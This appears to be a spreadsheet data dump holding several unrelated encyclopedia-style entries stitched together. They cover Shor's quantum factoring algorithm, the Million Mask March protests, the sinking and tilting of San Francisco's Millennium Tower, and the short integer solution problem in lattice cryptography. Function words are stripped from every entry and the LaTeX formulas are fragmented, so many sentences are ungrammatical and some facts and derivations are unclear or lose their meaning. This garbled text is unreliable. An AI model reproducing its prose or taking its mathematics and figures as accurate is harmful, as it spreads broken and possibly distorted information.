function, function even period certain additional property explained below, required condition step classical part hold). quantum algorithm used finding period randomly chosen elements {\displaystyle difficult problem classical computer. classical part example: given {\displaystyle n=15} {\displaystyle a=7} {\displaystyle r=4} {\displaystyle \gcd(7^{2}\pm 1,15)=\gcd(49\pm 1,15)} {\displaystyle \gcd(48,15)=3} {\displaystyle \gcd(50,15)=5} {\displaystyle product distinct primes, {\displaystyle {\displaystyle {\displaystyle \varphi (n)=(p-1)(q-1)} {\displaystyle n=15} {\displaystyle {\displaystyle divides {\displaystyle quantum part: period-finding subroutine quantum circuits used algorithm custom designed choice {\displaystyle choice random {\displaystyle used {\displaystyle f(x)=a^{x}{\bmod {n}}} given {\displaystyle find {\displaystyle q=2^{q}} {\displaystyle n^{2}\leq q&lt;2n^{2}} implies {\displaystyle {\dfrac {q}{r}}&gt;n} input output qubit registers need hold superpositions values {\displaystyle {\displaystyle q-1} {\displaystyle qubits each. using might appear twice many qubits necessary guarantees least {\displaystyle different values {\displaystyle produce {\displaystyle f(x)} even period {\displaystyle approaches {\displaystyle {\dfrac {n}{2}}} proceed follows: explanation algorithm algorithm composed parts. first part algorithm turns factoring problem problem finding period function implemented classically. second part finds period using quantum fourier transform responsible quantum speedup. non-trivial square root shor's algorithm hinges finding non-trivial square root {\displaystyle modulo {\displaystyle that solution {\displaystyle b^{2}\equiv 1{\bmod {n}}} {\displaystyle b\not \equiv 1{\bmod {n}}} {\displaystyle exists, claim {\displaystyle d=\gcd(b-1,n)} proper factor {\displaystyle i.e., {\displaystyle d\neq 1,n} fact, {\displaystyle d=n} {\displaystyle divides {\displaystyle b-1} {\displaystyle b\equiv 1{\bmod {n}}} goes construction {\displaystyle hand, {\displaystyle d=\gcd(b-1,n)=1} bézout's identity, integers {\displaystyle u,v} {\displaystyle (b-1)u+nv=1.} multiplying sides {\displaystyle b+1} obtain {\displaystyle (b^{2}-1)u+n(b+1)v=b+1.} {\displaystyle divides {\displaystyle b^{2}-1} find {\displaystyle divides {\displaystyle b+1} {\displaystyle b\equiv -1{\bmod {n}}} contradicting construction {\displaystyle therefore, {\displaystyle required proper factor {\displaystyle similarly, proven {\displaystyle \gcd(b+1,n)} also proper factor {\displaystyle non-trivial square root {\displaystyle modulo {\displaystyle exist, notice {\displaystyle -1\equiv 1{\bmod {2}}} power prime {\displaystyle n=p^{n}} non-trivial square root {\displaystyle modulo {\displaystyle {\displaystyle (b+1)(b-1)=mp^{n},} either {\displaystyle b-1} {\displaystyle b+1} multiple {\displaystyle n=p^{n}} therefore, shor's algorithm work, need {\displaystyle (otherwise {\displaystyle divisor) power prime (otherwise prime divisor). check integer roots {\displaystyle {\sqrt[{k}]{n}}} {\displaystyle 2\leq k\leq {\log _{3}}(n)} {\displaystyle power integer, power prime. here, upper bound integer {\displaystyle need check determined {\displaystyle {\sqrt[{k}]{n}}\geq since {\displaystyle odd, {\displaystyle {\sqrt[{k}]{n}}} cannot {\displaystyle this check, however, cannot rule {\displaystyle prime itself, ruled primality-testing algorithms. given {\displaystyle power prime, based fundamental theorem arithmetic, assume {\displaystyle product coprime integers greater {\displaystyle {\displaystyle n=n_{1}n_{2}} {\displaystyle n_{1},n_{2}&gt;2,\,\gcd(n_{1},n_{2})=1} from four combinations choosing plus sign minus sign integer equations {\displaystyle x=m_{1}n_{1}\pm 1=m_{2}n_{2}\pm based chinese remainder theorem {\displaystyle n_{1},n_{2}&gt;2} least four distinct square roots {\displaystyle modulo {\displaystyle therefore least distinct non-trivial square roots exist. fact, solutions {\displaystyle b'=m_{1}n_{1}+1=m_{2}n_{2}-1} {\displaystyle b''=m_{1}n_{1}-1=m_{2}n_{2}+1} obtaining factors period integers less {\displaystyle coprime {\displaystyle form multiplicative group integers modulo {\displaystyle finite abelian group {\displaystyle size group given {\displaystyle \varphi (n)} step integer {\displaystyle group. group finite, {\displaystyle must finite order {\displaystyle smallest positive integer {\displaystyle a^{r}\equiv 1{\bmod {n}}.} this order {\displaystyle finite cyclic subgroup group {\displaystyle (\mathbb _{n})^{\times smallest positive integer {\displaystyle {\displaystyle a^{x+r}{\bmod {n}}\equiv a^{x}{\bmod {n}}} since {\displaystyle {\displaystyle coprime, euler's totient theorem, {\displaystyle must exist, divides {\displaystyle \varphi (n)} {\displaystyle \varphi denotes euler's totient function. therefore, {\displaystyle divides {\displaystyle a^{r}-1} (also written {\displaystyle n\mid a^{r}-1} suppose able obtain {\displaystyle even. {\displaystyle odd, step restart algorithm different random number {\displaystyle {\displaystyle b\equiv a^{r/2}{\bmod {n}}} square root {\displaystyle modulo {\displaystyle different {\displaystyle this {\displaystyle order {\displaystyle modulo {\displaystyle {\displaystyle a^{r/2}\not \equiv 1{\bmod {n}}} else order {\displaystyle group would {\displaystyle {\dfrac {r}{2}}} {\displaystyle a^{r/2}\equiv -1{\bmod {n}}} step restart algorithm different random number {\displaystyle eventually, must {\displaystyle order {\displaystyle {\displaystyle {\displaystyle b\equiv a^{r/2}\not \equiv 1{\bmod {n}}} this {\displaystyle square root {\displaystyle modulo {\displaystyle {\displaystyle {\displaystyle whose existence guaranteed chinese remainder theorem, number {\displaystyle prime power. finding period shor's period-finding algorithm relies heavily ability quantum computer many states simultaneously. physicists call behavior "superposition" states. compute period function {\displaystyle evaluate function points simultaneously. quantum physics allow access information directly, however. measurement yield possible values, destroying others. no-cloning theorem, could first measure {\displaystyle f(x)} without measuring {\displaystyle make copies resulting state (which superposition states {\displaystyle f(x)} measuring {\displaystyle states would provide different {\displaystyle values give {\displaystyle f(x)} leading period. because cannot make exact copies quantum state, method work. therefore, carefully transform superposition another state return correct answer high probability. this achieved quantum fourier transform. shor thus solve three "implementation" problems. implemented "fast", means implemented number quantum gates polynomial {\displaystyle \log create superposition states. this done applying hadamard gates qubits input register. another approach would quantum fourier transform (see below). implement function {\displaystyle quantum transform. achieve this, shor used repeated squaring modular exponentiation transformation. important note step difficult implement quantum fourier transform, requires ancillary qubits substantially gates accomplish. perform quantum fourier transform. using controlled rotation gates hadamard gates, shor designed circuit quantum fourier transform (with {\displaystyle q=2^{q}} uses {\displaystyle {\dfrac {q(q-1)}{2}}=o\!\left((\log q)^{2}\right)} gates.after transformations, measurement yield approximation period {\displaystyle simplicity assume {\displaystyle {\displaystyle {\dfrac {yr}{q}}} integer. then probability measure {\displaystyle {\displaystyle this, notice {\displaystyle e^{-{\frac {2\pi ibyr}{q}}}=1} integers {\displaystyle therefore, whose square gives probability measure {\displaystyle {\displaystyle {\dfrac {q}{r}}} {\displaystyle takes roughly {\displaystyle {\dfrac {q}{r}}} values thus probability {\displaystyle {\dfrac {1}{r^{2}}}} there {\displaystyle possible values {\displaystyle {\displaystyle {\dfrac {yr}{q}}} integer, also {\displaystyle possibilities {\displaystyle f(x_{0})} probabilities {\displaystyle period-finding routine considered variation general quantum phase estimation algorithm determine eigenvalue unitary corresponding eigenvector. case period-finding routine used shor's algorithm, unitary question modular multiplication chosen base {\displaystyle while computational basis {\displaystyle |1\rangle eigenvector unitary, uniform superposition {\displaystyle eigenvectors thus measurement give eigenvalue's phase eigenvectors. since phases used extract period, retries subroutine necessary. bottleneck runtime bottleneck shor's algorithm quantum modular exponentiation, slower quantum fourier transform classical pre-/post-processing. there several approaches constructing optimizing circuits modular exponentiation. simplest (currently) practical approach mimic conventional arithmetic circuits reversible gates, starting ripple-carry adders. knowing base modulus exponentiation facilitates optimizations. reversible circuits typically order {\displaystyle n^{3}} gates {\displaystyle qubits. alternative techniques asymptotically improve gate counts using quantum fourier transforms, competitive fewer qubits owing high constants. discrete logarithms given group {\displaystyle order {\displaystyle generator {\displaystyle g\in suppose know {\displaystyle x=g^{r}\in {\displaystyle r\in \mathbb _{p}} wish compute {\displaystyle discrete logarithm: {\displaystyle r={\log _{g}}(x)} consider abelian group {\displaystyle \mathbb _{p}\times \mathbb _{p}} factor corresponds modular addition values. now, consider function {\displaystyle f\colon \mathbb _{p}\times \mathbb _{p}\to g\;;\;f(a,b)=g^{a}x^{-b}.} this gives abelian hidden subgroup problem, {\displaystyle corresponds group homomorphism. kernel corresponds multiples {\displaystyle (r,1)} find kernel, find {\displaystyle quantum algorithm solving problem exists. this algorithm like factor-finding algorithm, peter shor implemented creating superposition using hadamard gates, followed implementing {\displaystyle quantum transform, followed finally quantum fourier transform. this, quantum algorithm computing discrete logarithm also occasionally referred "shor's algorithm." order-finding problem also viewed hidden subgroup problem. this, consider group integers addition, given {\displaystyle a\in \mathbb that: {\displaystyle a^{r}=1} function {\displaystyle f\colon \mathbb \mathbb \;;\;f(x)=a^{x},\;f(x+r)=f(x).} finite abelian group quantum algorithm exists solving hidden subgroup polynomial time. also geecm, factorization algorithm said "often much faster shor's" grover's algorithm peter shor references further reading nielsen, michael chuang, isaac (2010), quantum computation quantum information, 10th anniversary edition, cambridge university press, isbn 9781107002173. phillip kaye, raymond laflamme, michele mosca, introduction quantum computing, oxford university press, 2007, isbn 0-19-857049-x "explanation street" scott aaronson, "approved" peter shor. (shor wrote "great article, scott! that’s best explaining quantum computing street i’ve seen."). alternate metaphor presented comments. scott aaronson suggests following references reading (out "the 10105000 quantum algorithm tutorials already web."): shor, peter (1997), "polynomial-time algorithms prime factorization discrete logarithms quantum computer", siam comput., (5): 1484–1509, arxiv:quant-ph/9508027v2, bibcode:1999siamr..41..303s, doi:10.1137/s0036144598347011. revised version original paper peter shor ("28 pages, latex. this expanded version paper appeared proceedings 35th annual symposium foundations computer science, santa nov. 20--22, 1994. minor revisions made january, 1996"). quantum computing shor's algorithm, matthew hayward's quantum algorithms page, 2005-02-17, imsa.edu, latex2html version original latex document, also available postscript document. quantum computation shor's factoring algorithm, ronald wolf, university amsterdam, january 1999, page postscript document. shor's factoring algorithm, notes lecture berkeley 294–2, dated 2004, page postscript document. chapter quantum computation, page postscript document, caltech, preskill, ph229. quantum computation: tutorial samuel braunstein. quantum states shor's algorithm, neal young, last modified: 11:47:38 1996. iii. breaking encryption quantum computer: shor's factoring algorithm, lecture notes quantum computation, cornell university, physics 481–681, 483; spring, 2006 david mermin. last revised 2006-03-28, page document. lavor, manssur, portugal, (2003). "shor's algorithm factoring large integers". arxiv:quant-ph/0303175. lomonaco, (2000). "shor's quantum factoring algorithm". arxiv:quant-ph/0010034. this paper written version one-hour lecture given peter shor's quantum factoring algorithm. pages. chapter quantum computation, computational complexity: modern approach, draft book: dated january 2007, sanjeev arora boaz barak, princeton university. published chapter quantum computation sanjeev arora, boaz barak, "computational complexity: modern approach", cambridge university press, 2009, isbn 978-0-521-42426-4 step toward quantum computing: entangling billion particles, "discover magazine", dated january 2011. josef gruska quantum computing challenges also mathematics unlimited: 2001 beyond, editors björn engquist, wilfried schmid, springer, 2001, isbn 978-3-540-66913-5 external links version 1.0.0 libquantum: contains language implementation shor's algorithm simulated quantum computer library, width variable shor.c improve runtime complexity. infinite series created videos explaining math behind shor's algorithm, "how break cryptography" "hacking quantum speed shor's algorithm".</t>
  </si>
  <si>
    <t>Million Mask March</t>
  </si>
  <si>
    <t>million mask march, also known "operation vendetta", worldwide, annual protest associated hacktivist group anonymous occurring annually fawkes day, november. motive march varies, includes consistent themes prevalent anonymous movement, including: corruption politics, demilitarization, police violence, self-governance. marches motion allow ordinary citizens collaborate order create societal change alterations governments. they coordinated host channels prevalent word mouth social media. hundreds facebook events dedicated twitter accounts used advertise protest around world. history anonymous, originally group internet forum users, first came political activism battle scientology, referred project chanology. this culminated worldwide protest outside scientology churches across globe.the first million mask march occurred 2012; largest events occurred london washington, smaller scale events across globe, usually outside government buildings. symbolism protesters million mask march frequently wear versions fawkes mask homage graphic novel vendetta’. costume references novel, protagonist wages authoritarian dystopia film rendition, millions masks distributed citizens gather around parliament. events london, march become annual occurrence london. protesters marched central london november 2015 protest manner british government conducts surveillance country, suspected corruption believe become ingrained government, dissatisfaction state's socio-economic issues. during 2016 protest, protesters arrested march central london related drug use, destruction property criminal activity. manila, philippines: activists linked hacktivism group anonymous crashed filipino government's websites response corruption felt toward politicians. group released video apologizing people philippines disruption courting protest front parliament house november 2013. references</t>
  </si>
  <si>
    <t>Millennium Tower (San Francisco)</t>
  </si>
  <si>
    <t>mission street high-rise building south market district downtown francisco. mixed-use, primarily residential high rise, tallest residential building francisco. building modified effort stop sinking.the blue-gray glass, late-modernist buildings bounded mission, fremont, beale streets, north transbay transit center site. opened residents april 2009, mission includes buildings: 12-story tower located northeast property, millennium tower, 58-story, 645-foot-tall (197 condominium skyscraper. total, project residential units, units smaller tower. larger tower's highest level, floors ground, listed 60th, floors missing superstitious reasons. resident services include private concierge access 20,000-square-foot (1,900 owner's club level, features amenities private lounge, wine cellar, fitness center. development's "lifestyle" program organizes cultural events.in 2016, residents informed main tower sinking tilting, resulting several lawsuits concerning repair costs whether tilt withheld buyers. description developed mission street development llc, affiliate millennium partners, us$350 million project designed handel architects, engineered desimone consulting engineers constructed webcor builders. feet (197 tallest concrete structure francisco, fourth tallest building francisco overall, tallest since california street 1986. also tallest residential building west mississippi river finished (later surpassed austonian texas). tower slender, floor containing 14,000 square feet (1,300 floor space. addition 58-story tower, 125-foot 11-story tower northeast complex. between towers 43-foot two-story glass atrium. total, project units.the residences expensive; penthouse unit sold million december 2016. bottom floors main tower called residences floors name grand residences. common many high-rises, thirteenth floor superstitions related triskaidekaphobia. neither forty-fourth floor, number four considered unlucky many asians.) units separate 12-story tower called city residences. below street level, parking spaces five-level subterranean garage located 11-story tower. building located next site transbay transit center. overall, tower's design intended resemble translucent crystal, landmark transbay redevelopment southern skyline francisco.the development also home international smoke restaurant bar, located ground floor skyscraper. history millennium partners first proposed development 2002 condominiums, rentals 136-unit "extended stay" hotel. project approved 2003 s.f. planning commission construction began 2005. vote project came planning commissioner lee. development first high rise built downtown years. according modern luxury, proposed 52-story skyscraper nearby natoma developer jack myers would also similar cast place concrete construction, rejected city's department building inspections (dbi) outside peer review. millennium tower received scrutiny, since millennium partners would submit peer review, study would potentially delayed construction years. treadwell rollo, geotechnical engineer millennium tower, also geotechnical engineer scrapped project natoma.on september 2010, goodwin, also known spiderdan skyscraperman, scaled outside tower using suction cups. following climb, goodwin arrested francisco police, charged trespassing creating public nuisance.in 2013, building sold final unit, generating us$750 million total sales, percent return estimated us$600 million development costs. sinking tilting problem discovery after developers apparently disclosed 2015 building sinking tilting, public notified problem 2016. treadwell rollo's geotechnical design foundation main tower consists concrete slab built 60-to-90-foot deep concrete friction piles fill young mud, embedded dense colma sand. number buildings mission street’s area used similar systems, although varying earth conditions, others pushed piles directly bedrock feet below. examination 2016 showed building sunk inches two-inch (5.1 tilt base approximate six-inch tilt tower. building leaning toward northwest, caused cracks building's basement pavement surrounding tower. 2018, sinking increased inches lean inches cm). measurements 2022 show tilt increased inches cm), measured roofthe developer blames sinking problem transbay joint powers authority (tjpa), responsible construction neighboring transbay transit center (ttc). sinking problem reportedly started construction even broke ground, tjpa asserted building already settled inches cm), well past original maximum vertical settling prediction inches years, time tjpa began removing timber piles prior transbay terminal 2011. building's homeowners association, represented general counsel adrian adams adams stirling plc, retained petrocelli o’melveny myers, webcor, millennium partners, tjpa. originally, homeowners association hired david casselman tjpa instead developer millennium partners, casselman noted "inverse condemnation allows residents collect legal fees award, whereas suing developer steer percent award lawyers".another group tenants disagree homeowners association, resident patent litigator jerry dodson, suing millennium partners, city francisco, tjpa. breaking casselman homeowners association, dodson regarded millennium partners responsible culprit.in november 2016, city francisco filed suit tower's developer mission street developers llc, claiming developers withheld information sinking problems potential apartment buyers. mission street developers rejected city's claims.sage engineers hired millennium partners provide engineering study sinking problem. some experts prognosticated cost tilt could exceed liability insurance held millennium partners building's various construction vendors. tjpa found fault, francisco taxpayers could paying repairs.as 2017, city inspection found building still safe occupy, though damage foundation electrical system.in march 2017, homeowners association filed suit millennium partners, webcor, handel architects, treadwell rollo, desimone consulting engineers, arup, transbay joint powers authority. they seeking $200 million cover repairs damages.in early september 2018, residents reported hearing various "creaking sounds". around 2:30 a.m. morning saturday, september 2018, residents reported hearing loud "popping sound". sunday, following day, resident located corner unit 36th floor discovered cracked window. glass used building's windows facade rated withstand hurricane force winds, leading concern crack symptom much larger structural failure. underpinning millennium tower december 2018, ronald hamburger, senior principal engineer simpson gumpertz heger, revealed press release final resolution millennium tower's tilting sinking problem underpinning building. solution involve installation piles along north west sides tower beneath sidewalk reach (76.2 bedrock downtown francisco tied original 60–90 (18.3–27.4 deep foundation piles. estimated tilt evened period years south eastern sides building come back re-alignment sunken north western sides building, point remaining south eastern sides building anchored bedrock, permanently resolving tilting sinking building. cost $100 million. lawsuits consolidated global agreement work expected start mid-november 2020. funding includes million taxpayers transbay joint powers authority.in november 2020, $100 million "perimeter pile upgrade" repair project began planned pilings sunk bedrock. these pilings would tied existing foundation mitigate sinking. building's tilting problem came renewed scrutiny following deadly collapse champlain towers south surfside, florida, june 2021. repair project halted august 2021 monitoring indicated building unexpectedly sunk additional inch fremont street side piles installed. inch drop translates additional inches lean 58th floor. september 2021, francisco city officials told millennium tower management resume construction work city reviews updated construction approach. february 2022, hamburger also discovered tower moved inch away adjacent building containing parking garage. this pose structural safety hazard unlikely worsen repair work, reversing shift would allow reopening parking garage elevators. awards building garnered several awards several engineering architectural organisations. 2008: american concrete institute awards, northern california construction 2008: concrete industry board roger award merit 2009: american society civil engineers, region structural engineering project year 2008: american society civil engineers, francisco section outstanding structural engineering project 2009: metal architecture magazine april 2009 edition honor 2009: california construction outstanding project management 2009: california construction multi-family/residential, award merit 2010: francisco business times deal year award 2010: francisco chamber commerce excellence business awards building francisco award notable residents kevin durant drew houston montana hunter pence perkins gallery also list tallest buildings francisco references external links official website</t>
  </si>
  <si>
    <t>Short integer solution problem</t>
  </si>
  <si>
    <t>short integer solution (sis) ring-sis problems average-case problems used lattice-based cryptography constructions. lattice-based cryptography began 1996 seminal work miklós ajtai presented family one-way functions based problem. showed secure average case shortest vector problem {\displaystyle \mathrm {svp} _{\gamma (where {\displaystyle \gamma =n^{c}} constant {\displaystyle c&gt;0} hard worst-case scenario. average case problems problems hard solved randomly selected instances. cryptography applications, worst case complexity sufficient, need guarantee cryptographic construction hard based average case complexity. lattices full rank lattice {\displaystyle {\mathfrak {l}}\subset \mathbb ^{n}} integer linear combinations {\displaystyle linearly independent vectors {\displaystyle \{b_{1},\ldots ,b_{n}\}} named basis: {\displaystyle {\mathfrak {l}}(b_{1},\ldots ,b_{n})=\left\{\sum _{i=1}^{n}z_{i}b_{i}:z_{i}\in \mathbb \right\}=\{b{\boldsymbol {z}}:{\boldsymbol {z}}\in \mathbb ^{n}\}} {\displaystyle b\in \mathbb ^{n\times matrix basis vectors columns. remark: given {\displaystyle b_{1},b_{2}} bases lattice {\displaystyle {\mathfrak {l}}} exist unimodular matrices {\displaystyle u_{1}} {\displaystyle b_{1}=b_{2}u_{1}^{-1},b_{2}=b_{1}u_{1}} ideal lattice definition: rotational shift operator {\displaystyle \mathbb ^{n}(n\geq denoted {\displaystyle \operatorname {rot} defined {\displaystyle \forall {\boldsymbol {x}}=(x_{1},\ldots ,x_{n-1},x_{n})\in \mathbb ^{n}:\operatorname {rot} (x_{1},\ldots ,x_{n-1},x_{n})=(x_{n},x_{1},\ldots ,x_{n-1})} cyclic lattices micciancio introduced cyclic lattices work generalizing compact knapsack problem arbitrary rings. cyclic lattice lattice closed rotational shift operator. formally, cyclic lattices defined follows: definition: lattice {\displaystyle {\mathfrak {l}}\subseteq \mathbb ^{n}} cyclic {\displaystyle \forall {\boldsymbol {x}}\in {\mathfrak {l}}:\operatorname {rot} ({\boldsymbol {x}})\in {\mathfrak {l}}} examples: {\displaystyle \mathbb ^{n}} cyclic lattice. lattices corresponding ideal quotient polynomial ring {\displaystyle r=\mathbb [x]/(x^{n}-1)} cyclic:consider quotient polynomial ring {\displaystyle r=\mathbb [x]/(x^{n}-1)} {\displaystyle p(x)} polynomial {\displaystyle i.e. {\displaystyle p(x)=\sum _{i=0}^{n-1}a_{i}x^{i}} {\displaystyle a_{i}\in \mathbb {\displaystyle i=0,\ldots ,n-1} define embedding coefficient {\displaystyle \mathbb -module isomorphism {\displaystyle \rho {\displaystyle {\begin{aligned}\quad \rho :r&amp;\rightarrow \mathbb ^{n}\\[4pt]\rho (x)=\sum _{i=0}^{n-1}a_{i}x^{i}&amp;\mapsto (a_{0},\ldots ,a_{n-1})\end{aligned}}} {\displaystyle i\subset ideal. lattice corresponding ideal {\displaystyle i\subset denoted {\displaystyle {\mathfrak {l}}_{i}} sublattice {\displaystyle \mathbb ^{n}} defined {\displaystyle {\mathfrak {l}}_{i}:=\rho (i)=\left\{(a_{0},\ldots ,a_{n-1})\mid \sum _{i=0}^{n-1}a_{i}x^{i}\in i\right\}\subset \mathbb ^{n}.} theorem: {\displaystyle {\mathfrak {l}}\subset \mathbb ^{n}} cyclic {\displaystyle {\mathfrak {l}}} corresponds ideal {\displaystyle quotient polynomial ring {\displaystyle r=\mathbb [x]/(x^{n}-1)} proof: {\displaystyle \leftarrow have: {\displaystyle {\mathfrak {l}}={\mathfrak {l}}_{i}:=\rho (i)=\left\{(a_{0},\ldots ,a_{n-1})\mid \sum _{i=0}^{n-1}a_{i}x^{i}\in i\right\}} {\displaystyle (a_{0},\ldots ,a_{n-1})} arbitrary element {\displaystyle {\mathfrak {l}}} then, define {\displaystyle p(x)=\sum _{i=0}^{n-1}a_{i}x^{i}\in since {\displaystyle ideal, {\displaystyle xp(x)\in then, {\displaystyle \rho (xp(x))\in {\mathfrak {l}}_{i}} but, {\displaystyle \rho (xp(x))=\operatorname {rot} (a_{0},\ldots ,a_{n-1})\in {\mathfrak {l}}_{i}} hence, {\displaystyle {\mathfrak {l}}} cyclic. {\displaystyle \rightarrow {\displaystyle {\mathfrak {l}}\subset \mathbb ^{n}} cyclic lattice. hence {\displaystyle \forall (a_{0},\ldots ,a_{n-1})\in {\mathfrak {l}}:\operatorname {rot} (a_{0},\ldots ,a_{n-1})\in {\mathfrak {l}}} define polynomials {\displaystyle i:=\left\{\sum _{i=0}^{n-1}a_{i}x^{i}\mid (a_{0},\ldots ,a_{n-1})\in {\mathfrak {l}}\right\}} since {\displaystyle {\mathfrak {l}}} lattice hence additive subgroup {\displaystyle \mathbb ^{n}} {\displaystyle i\subset additive subgroup {\displaystyle since {\displaystyle {\mathfrak {l}}} cyclic, {\displaystyle \forall p(x)\in i:xp(x)\in .hence, {\displaystyle i\subset ideal, consequently, {\displaystyle {\mathfrak {l}}={\mathfrak {l}}_{i}} ideal lattices {\displaystyle f(x)\in \mathbb [x]} monic polynomial degree {\displaystyle cryptographic applications, {\displaystyle f(x)} usually selected irreducible. ideal generated {\displaystyle f(x)} {\displaystyle (f(x)):=f(x)\cdot \mathbb [x]=\{f(x)g(x):\forall g(x)\in \mathbb [x]\}.} quotient polynomial ring {\displaystyle r=\mathbb [x]/(f(x))} partitions {\displaystyle \mathbb [x]} equivalence classes polynomials degree {\displaystyle n-1} {\displaystyle r=\mathbb [x]/(f(x))=\left\{\sum _{i=0}^{n-1}a_{i}x^{i}:a_{i}\in \mathbb \right\}} addition multiplication reduced modulo {\displaystyle f(x)} consider embedding coefficient {\displaystyle \mathbb -module isomorphism {\displaystyle \rho then, ideal {\displaystyle defines sublattice {\displaystyle \mathbb ^{n}} called ideal lattice. definition: {\displaystyle {\mathfrak {l}}_{i}} lattice corresponding ideal {\displaystyle called ideal lattice. more precisely, consider quotient polynomial ring {\displaystyle r=\mathbb [x]/(p(x))} {\displaystyle (p(x))} ideal generated degree {\displaystyle polynomial {\displaystyle p(x)\in \mathbb [x]} {\displaystyle {\mathfrak {l}}_{i}} sublattice {\displaystyle \mathbb ^{n}} defined {\displaystyle {\mathfrak {l}}_{i}:=\rho (i)=\left\{(a_{0},\ldots ,a_{n-1})\mid \sum _{i=0}^{n-1}a_{i}x^{i}\in i\right\}\subset \mathbb ^{n}.} remark: turns gapsvp {\displaystyle {\text{gapsvp}}_{\gamma even small {\displaystyle \gamma =\operatorname {poly(n)} typically easy ideal lattices. intuition algebraic symmetries causes minimum distance ideal within narrow, easily computable range. exploiting provided algebraic symmetries ideal lattices, convert short nonzero vector {\displaystyle linearly independent ones (nearly) length. therefore, ideal lattices, {\displaystyle \mathrm {svp} _{\gamma {\displaystyle \mathrm {sivp} _{\gamma equivalent small loss. furthermore, even quantum algorithms, {\displaystyle \mathrm {svp} _{\gamma {\displaystyle \mathrm {sivp} _{\gamma believed hard worst-case scenario. short integer solution problem ring-sis average case problems used lattice-based cryptography constructions. lattice-based cryptography began 1996 seminal work ajtai presented family one-way functions based problem. showed secure average case {\displaystyle \mathrm {svp} _{\gamma (where {\displaystyle \gamma =n^{c}} constant {\displaystyle c&gt;0} hard worst-case scenario. sisn,m,q,β {\displaystyle a\in \mathbb _{q}^{n\times {\displaystyle n\times matrix entries {\displaystyle \mathbb _{q}} consists {\displaystyle uniformly random vectors {\displaystyle {\boldsymbol {a_{i}}}\in \mathbb _{q}^{n}} {\displaystyle a=[{\boldsymbol {a_{1}}}|\cdots |{\boldsymbol {a_{m}}}]} find nonzero vector {\displaystyle {\boldsymbol {x}}\in \mathbb ^{m}} that: {\displaystyle \|{\boldsymbol {x}}\|\leq \beta {\displaystyle f_{a}({\boldsymbol {x}}):=a{\boldsymbol {x}}={\boldsymbol {0}}\in \mathbb _{q}^{n}} solution without required constraint length solution {\displaystyle \|{\boldsymbol {x}}\|\leq \beta easy compute using gaussian elimination technique. also require {\displaystyle \beta otherwise {\displaystyle {\boldsymbol {x}}=(q,0,\ldots ,0)\in \mathbb ^{m}} trivial solution. order guarantee {\displaystyle f_{a}({\boldsymbol {x}})} non-trivial, short solution, require: {\displaystyle \beta \geq {\sqrt {n\log q}}} {\displaystyle m\geq n\log theorem: poly {\displaystyle m=\operatorname {poly} (n)} {\displaystyle \beta sufficiently large {\displaystyle q\geq \beta n^{c}} (for constant {\displaystyle c&gt;0} solving {\displaystyle \operatorname {sis} _{n,m,q,\beta nonnegligible probability least hard solving gapsvp {\displaystyle \operatorname {gapsvp} _{\gamma sivp {\displaystyle \operatorname {sivp} _{\gamma {\displaystyle \gamma =\beta \cdot o({\sqrt {n}})} high probability worst-case scenario. ring-sis ring-sis problem, compact ring-based analogue problem, studied they consider quotient polynomial ring {\displaystyle r=\mathbb [x]/(f(x))} {\displaystyle f(x)=x^{n}-1} {\displaystyle x^{2^{k}}+1} respectively, extend definition norm vectors {\displaystyle \mathbb ^{n}} vectors {\displaystyle r^{m}} follows: given vector {\displaystyle {\vec {\boldsymbol {z}}}=(p_{1},\ldots ,p_{m})\in r^{m}} {\displaystyle p_{i}(x)} polynomial {\displaystyle consider embedding coefficient {\displaystyle \mathbb -module isomorphism {\displaystyle \rho {\displaystyle {\begin{aligned}&amp;\rho :r\rightarrow \mathbb ^{n}\\[3pt]\rho (x)&amp;=\sum _{i=0}^{n-1}a_{i}x^{i}\mapsto (a_{0},\ldots ,a_{n-1})\end{aligned}}} {\displaystyle {\boldsymbol {z_{i}}}=\rho (p_{i}(x))\in \mathbb ^{n}} define norm {\displaystyle {\vec {\boldsymbol {z}}}} {\displaystyle \|{\vec {\boldsymbol {z}}}\|:={\sqrt {\sum _{i=1}^{m}\|{\boldsymbol {z_{i}}}\|^{2}}}} alternatively, better notion norm achieved exploiting canonical embedding. canonical embedding defined {\displaystyle {\begin{aligned}\sigma :r=\mathbb /(f(x))&amp;\rightarrow \mathbb ^{n}\\p(x)&amp;\mapsto (p(\alpha _{1}),\ldots ,p(\alpha _{n}))\end{aligned}}} {\displaystyle \alpha _{i}} {\displaystyle i^{th}} complex root {\displaystyle f(x)} {\displaystyle i=1,\ldots r-sism,q,β given quotient polynomial ring {\displaystyle r=\mathbb [x]/(f(x))} define {\displaystyle r_{q}:=r/qr=\mathbb _{q}[x]/(f(x))} select {\displaystyle independent uniformly random elements {\displaystyle a_{i}\in r_{q}} define vector {\displaystyle {\vec {\boldsymbol {a}}}:=(a_{1},\ldots ,a_{m})\in r_{q}^{m}} find nonzero vector {\displaystyle {\vec {\boldsymbol {z}}}:=(p_{1},\ldots ,p_{m})\in r^{m}} that: {\displaystyle \|{\vec {\boldsymbol {z}}}\|\leq \beta {\displaystyle f_{\vec {\boldsymbol {a}}}({\vec {\boldsymbol {z}}}):={\vec {\boldsymbol {a}}}^{\,t}.{\vec {\boldsymbol {z}}}=\sum _{i=1}^{m}a_{i}.p_{i}=0\in r_{q}} recall guarantee existence solution problem, require {\displaystyle m\approx n\log however, ring-sis problem provide compactness efficacy: guarantee existence solution ring-sis problem, require {\displaystyle m\approx \log definition: nega-circulant matrix {\displaystyle defined {\displaystyle {\text{for}}\quad b=\sum _{i=0}^{n-1}b_{i}x^{i}\in r,\quad \operatorname {rot} (b):={\begin{bmatrix}b_{0}&amp;-b_{n-1}&amp;\ldots &amp;-b_{1}\\[0.3em]b_{1}&amp;b_{0}&amp;\ldots &amp;-b_{2}\\[0.3em]\vdots &amp;\vdots &amp;\ddots &amp;\vdots \\[0.3em]b_{n-1}&amp;b_{n-2}&amp;\ldots &amp;b_{0}\end{bmatrix}}} when quotient polynomial ring {\displaystyle r=\mathbb [x]/(x^{n}+1)} {\displaystyle n=2^{k}} ring multiplication {\displaystyle a_{i}.p_{i}} efficiently computed first forming {\displaystyle \operatorname {rot} (a_{i})} nega-circulant matrix {\displaystyle a_{i}} multiplying {\displaystyle \operatorname {rot} (a_{i})} {\displaystyle \rho (p_{i}(x))\in z^{n}} embedding coefficient vector {\displaystyle p_{i}} (or, alternatively {\displaystyle \sigma (p_{i}(x))\in z^{n}} canonical coefficient vector). moreover, r-sis problem special case problem matrix {\displaystyle problem restricted negacirculant blocks: {\displaystyle a=[\operatorname {rot} (a_{1})|\cdots |\operatorname {rot} (a_{m})]} also lattice-based cryptography homomorphic encryption ring learning errors 